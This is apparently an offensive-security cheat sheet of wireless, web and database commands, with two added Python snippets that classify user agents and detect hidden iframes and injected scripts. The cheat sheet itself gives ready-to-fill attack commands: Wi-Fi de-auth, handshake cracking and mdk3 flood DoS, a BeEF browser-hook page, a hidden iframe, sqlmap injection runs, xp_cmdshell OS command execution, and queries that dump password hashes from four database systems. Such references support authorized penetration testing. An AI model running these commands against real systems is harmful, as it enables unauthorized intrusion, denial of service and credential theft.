Table Of Contents

  • Wireless
    • Frequency Chart
    • Helpful RF Websites
    • Kismet Command Reference
    • Linux Wi-Fi Commands
    • Linux Bluetooth
    • Linux Wi-Fi Testing
    • Wi-Fi DOS Attacks
  • Web
    • User Agent String Keywords
    • HTML Beef Hook Technique
    • Embedded iframe
    • Firefox Type Conversions
    • Wget Capture Session Token
    • Curl
    • Automated Web Screenshots (WitnessMe)
    • SQLMap
  • Databases
    • MSSQL
    • POSTGRES
    • MySQL
    • Oracle

Wireless

Frequency Chart

FREQUENCY RANGE                                                         CLASSIFICATION
125-134 kHz (LF) | 13.56 MHz (HF) | 433 MHz, 860-930 MHz (UHF)          RFID
315 MHz (N. Am) | 433.92 MHz (Europe, Asia)                             Keyless Entry
698-894 MHz | 1710-1755 MHz | 1850-1910 MHz | 2110-2155 MHz             Cellular (US)
1176.45 MHz - L1 Band | 1227.60 MHz - L2 Band | 1575.42 MHz - L5 Band   GPS
1-2 GHz                                                                 L Band
868 MHz (Europe) | 915 MHz (US, Australia) | 2.4 GHz (worldwide)        802.15.4 (ZigBee)
2.4-2.4835 GHz                                                          802.15.1 (Bluetooth)
2.4 GHz                                                                 802.11b/g
5.0 GHz                                                                 802.11n
4-8 GHz                                                                 C Band
12-18 GHz                                                               Ku Band
18-26.5 GHz                                                             K Band
26.5-40 GHz                                                             Ka Band

HELPFUL RF WEBSITES

KISMET COMMAND REFERENCE

BINDING ACTION                                  BINDING ACTION
e       List Kismet servers                     r       Packet rate graph
h       Help                                    L       Lock channel hopping to selected channel
z       Toggle full-screen view                 a       View network statistics
n       Name current network                    H       Return to normal channel hopping
m       Toggle muting of sound                  p       Dump packet type
i       View detailed information for network   +/-     Expand/collapse groups
t       Tag or untag selected network           f       Follow network center
s       Sort network list                       CTRL+L  Re-draw the screen
g       Group tagged networks                   w       Track alerts
l       Show wireless card power levels         c       Show clients in current network
u       Ungroup current group                   Q       Quit Kismet
d       Dump printable strings                  x       Close popup window

LINUX WI-FI COMMANDS

Display wireless interface configuration

iwconfig

List current state of wireless devices

rfkill list

Turn on wireless interface

rfkill unblock all

Monitor all interfaces

airodump-ng <INTERFACE_NAME>

Connect to unsecured Wi-Fi

iwconfig ath0 essid <ESSID>
ifconfig ath0 up
dhclient ath0

Connect to WEP Wi-Fi network

iwconfig ath0 essid <ESSID> key <WEP_KEY>
ifconfig ath0 up
dhclient ath0

Connect to WPA-PSK Wi-Fi network

iwconfig ath0 essid <ESSID>
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

LINUX BLUETOOTH

Turn on Bluetooth interface

hciconfig <INTERFACE_NAME> up

Scan for Bluetooth devices

hcitool -i <INTERFACE_NAME> scan --flush --all

List open services

sdptool browse <TARGET_BDADDR>

Set as discoverable

hciconfig <INTERFACE_NAME> name "<BLUETOOTH_NAME>" class 0x520204 piscan

Clear pand sessions

pand -K

LINUX WI-FI TESTING

Stop monitor mode interface

airmon-ng stop <INTERFACE_NAME>

Start monitor mode interface

airmon-ng start <INTERFACE_NAME>
iwconfig <INTERFACE_NAME> channel <CHANNEL>

Capture traffic

airodump-ng -c <CHANNEL> --bssid <BSSID> -w <OUTPUT_PREFIX> <INTERFACE_NAME>

Force client de-auth

aireplay-ng -0 10 -a <BSSID> -c <VICTIM_MAC> <INTERFACE_NAME>

Brute force handshake

# WPA-PSK
aircrack-ng -w <WORDLIST_PATH> <CAPTURED_HANDSHAKE_FILE_PATH>
# EAP-MD5
eapmd5pass -r <CAPTURED_HANDSHAKE_FILE_PATH> -w <WORDLIST_PATH>

WI-FI DOS ATTACKS

Auth Flood

mdk3 <INTERFACE_NAME> a -a <BSSID>

Beacon Flood

mdk3 <INTERFACE_NAME> b -c <CHANNEL>

WEB

USER AGENT STRING KEYWORDS

  • Note: Keywords found in user agent strings aid in identifying the visiting operating system type.
  • Keyword: iPhone | Apple iPhone
    Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/102.0.5005.87 Mobile/15E148 Safari/604.1
  • Keyword: Android 12 | Android Phone
    Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.78 Mobile Safari/537.36
  • Keyword: Windows NT 10.0 | Windows Computer
    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
  • Keyword: Macintosh | Mac OS Computer
    Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
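As an added example (not part of the original cheat sheet), a small Python classifier that applies these keywords to the user-agent field of combined-format access-log lines and tallies visiting OS types. The log lines and 192.0.2.x addresses are constructed, and the version-extraction patterns are this example's own, not taken from the page.

```python
import re
from collections import Counter

# Combined log format: the user agent is the last double-quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# (keyword, OS family, version pattern). Keywords and families are the page's; the version
# patterns are this example's own. Rules are matched in order; "Macintosh" rather than
# "Mac OS X" keeps the iPhone string (which says "like Mac OS X") out of the Mac bucket.
UA_RULES = [
    ("iPhone", "Apple iPhone", re.compile(r"iPhone OS (\d+(?:_\d+)*)")),
    ("Android", "Android Phone", re.compile(r"Android (\d+(?:\.\d+)*)")),
    ("Windows NT 10.0", "Windows Computer", re.compile(r"Windows NT (\d+\.\d+)")),
    ("Macintosh", "Mac OS Computer", re.compile(r"Mac OS X (\d+(?:_\d+)*)")),
]

def classify_user_agent(ua):
    """Return (os_family, version); ("Unknown", None) when no keyword matches."""
    for keyword, family, version_re in UA_RULES:
        if keyword in ua:
            m = version_re.search(ua)
            return family, (m.group(1).replace("_", ".") if m else None)
    return "Unknown", None

def summarize_log(lines):
    """Count OS families seen in access-log lines; lines that do not parse are skipped."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            counts[classify_user_agent(m.group("ua"))[0]] += 1
    return counts

# The four user-agent strings listed on the page.
UA_IPHONE = "Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/102.0.5005.87 Mobile/15E148 Safari/604.1"
UA_ANDROID = "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.78 Mobile Safari/537.36"
UA_WINDOWS = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
UA_MAC = "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"

def log_line(ip, ua):
    """Constructed combined-format access-log line wrapping a user-agent string."""
    return f'{ip} - - [01/Jun/2022:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "{ua}"'

# Constructed sample log (documentation-range addresses), including a client with
# no page keyword and a line that is not in log format at all.
SAMPLE_LOG = [
    log_line("192.0.2.10", UA_IPHONE), log_line("192.0.2.11", UA_ANDROID),
    log_line("192.0.2.12", UA_WINDOWS), log_line("192.0.2.13", UA_MAC),
    log_line("192.0.2.14", UA_WINDOWS), log_line("192.0.2.15", "curl/7.81.0"),
    "not a log line",
]
```

Running `summarize_log(SAMPLE_LOG)` gives two Windows hits, one each for iPhone, Android and Mac, one Unknown, and skips the malformed line.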

HTML BEEF HOOK TECHNIQUE

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
 
<html>
<head>
<title><WEBSITE_TITLE></title>
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + ':<PORT>/<URI_TO_HOOK.JS>" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>
 
</head>
<WEBSITE_CONTENT>
</html>

EMBEDDED IFRAME

<iframe src="<URI/URL>" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style="visibility:hidden;display:none"> </iframe>
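An added detection-side example (not from the original page) that flags the two patterns shown in this section and the previous one when scanning saved HTML: an inline script that document.write()s a `<script src=...>` tag, and an iframe hidden by zero size or CSS. The sample page, its example.invalid URLs and port 3000 are constructed.

```python
import re
from html.parser import HTMLParser

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=", re.IGNORECASE)

class SuspiciousMarkupScanner(HTMLParser):
    """Collects (kind, detail, reason) findings for hidden iframes and hook-style inline scripts."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_script, self._script_buf = [], False, []
    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            reasons = []
            if "0" in (a.get("width", ""), a.get("height", "")):
                reasons.append("zero size")
            if "display:none" in style or "visibility:hidden" in style:
                reasons.append("hidden by CSS")
            if reasons:
                self.findings.append(("hidden iframe", a.get("src", ""), "; ".join(reasons)))
        elif tag == "script":
            self._in_script = True
    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script":
            body = "".join(self._script_buf)
            # Inline script that assembles a <script src=...> tag and document.write()s it.
            if "document.write" in body and SCRIPT_SRC_RE.search(body):
                self.findings.append(("script-injecting script", body.strip()[:40], "document.write of <script src>"))
            self._in_script, self._script_buf = False, []

def scan_html(html):
    """Parse one HTML document and return its findings (empty list when nothing is flagged)."""
    scanner = SuspiciousMarkupScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed test page: both patterns from these sections plus a benign, visible iframe.
SAMPLE_HTML = """<html><head><title>t</title><script>
var s = '<script src="' + location.protocol + '//' + location.host + ':3000/hook.js" type="text/javascript"><\\/script>';
document.write(s);
</script></head><body>
<iframe src="https://example.invalid/x" width="0" height="0" frameborder="0" tabindex="-1" title="empty" style="visibility:hidden;display:none"> </iframe>
<iframe src="https://example.invalid/video" width="560" height="315" title="Player"></iframe>
</body></html>"""
```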

FIREFOX TYPE CONVERSIONS

  • ASCII -> Base64: javascript:btoa("<ASCII_STRING>")
  • Base64 -> ASCII: javascript:atob("<BASE64>")
  • ASCII -> URI: javascript:encodeURI("<ASCII_STRING>")
  • URI -> ASCII: javascript:decodeURI("<ENCODED_URI>")

WGET CAPTURE SESSION TOKEN

wget -q --save-cookies=<OUTPUT_PATH> --keep-session-cookies --post-data="username=<USERNAME>&password=<PASSWORD>&Login=Login" <LOGIN_URL>

CURL

Grab headers and spoof user agent

curl -I -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" <URL>

Scrape site after login

curl -u <USERNAME>:<PASSWORD> -o <OUTPUT_FILE> <URL>

FTP

curl ftp://<USERNAME>:<PASSWORD>@<URL>/<DIRECTORY>

Sequential lookup

curl http://<URL>/<FILE_PATH>[1-10].txt

AUTOMATED WEB SCREENSHOTS (WITNESSME)

  • Note: WitnessMe is a tool that takes screenshots of webpages using Pyppeteer.

Update packages

apt-get update

Install Docker

apt-get install docker.io

Installation

docker pull byt3bl33d3r/witnessme

Get image ID

docker images

Run docker container mounting /transfer to the current directory on the host machine

docker run -it --entrypoint=/bin/sh -v $(pwd):/transfer <IMAGE_ID>

Run and execute scan

witnessme screenshot <IP_CIDR> -p <PORT>,<PORT>

cd into created scan folder

cd <FILE_PATH>

Copy screenshotted files back to host machine current working directory

cp *.png /transfer/

SQLMAP

GET request

sqlmap.py -u "http://<URL>?id=1&str=val"

POST request

sqlmap.py -u "http://<URL>" --data="id=1&str=val"

SQL injection against specific parameter with DB type specified

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" -b --dbms="<mssql|mysql|oracle|postgres>"

SQL injection on authenticated site

# Login and note cookie value (cookie1=val1, cookie2=val2)
sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"

SQL injection and collect DB version, name, and user

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" -b --current-db --current-user

SQL injection and get tables of DB=testdb

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" --tables -D "testdb"

SQL injection and get columns of user table

sqlmap.py -u "http://<URL>" --data="id=1&str=val" -p "id" --columns -T "users"

DATABASES

MSSQL

DB version

SELECT @@version

Detailed version info

EXEC xp_msver

Run OS command

EXEC master..xp_cmdshell 'net user'

Hostname & IP

SELECT HOST_NAME()

Current DB

SELECT DB_NAME()

List DBs

SELECT name FROM master..sysdatabases;

Current user

SELECT user_name()

List users

SELECT name FROM master..syslogins

List tables

SELECT name FROM master..sysobjects WHERE xtype='U';

List columns

SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable');

System table containing info on all tables

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

List all tables/columns

SELECT TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS;

Password hashes (2005)

SELECT name, password_hash FROM master.sys.sql_logins

POSTGRES

DB version

SELECT version();

Hostname & IP

SELECT inet_server_addr();

Current DB

SELECT current_database();

List DBs

SELECT datname FROM pg_database;

Current user

SELECT user;

List users

SELECT usename FROM pg_user;

List password hashes

SELECT usename, passwd FROM pg_shadow;

List columns

SELECT relname, A.attname
FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T
WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid)
  AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped)
  AND (N.nspname ILIKE 'public')

List tables

SELECT c.relname
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast')
  AND pg_catalog.pg_table_is_visible(c.oid)

MYSQL

DB version

SELECT @@version;

Hostname & IP

SELECT @@hostname;

Current DB

SELECT database();

List DBs

SELECT distinct(db) FROM mysql.db;

Current user

SELECT user();

List users

SELECT user FROM mysql.user;

List password hashes

SELECT host,user,password FROM mysql.user;

List all tables & columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

ORACLE

DB version

SELECT * FROM v$version;
SELECT version FROM v$instance;

Current DB

SELECT instance_name FROM v$instance;
SELECT name FROM v$database;

List DBs

SELECT DISTINCT owner FROM all_tables;

Current user

SELECT user FROM dual;

List users

SELECT username FROM all_users ORDER BY username;

List columns

SELECT column_name FROM all_tab_columns;

List tables

SELECT table_name FROM all_tables;

List password hashes

SELECT name, password, astatus FROM sys.user$;

List DBAs

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';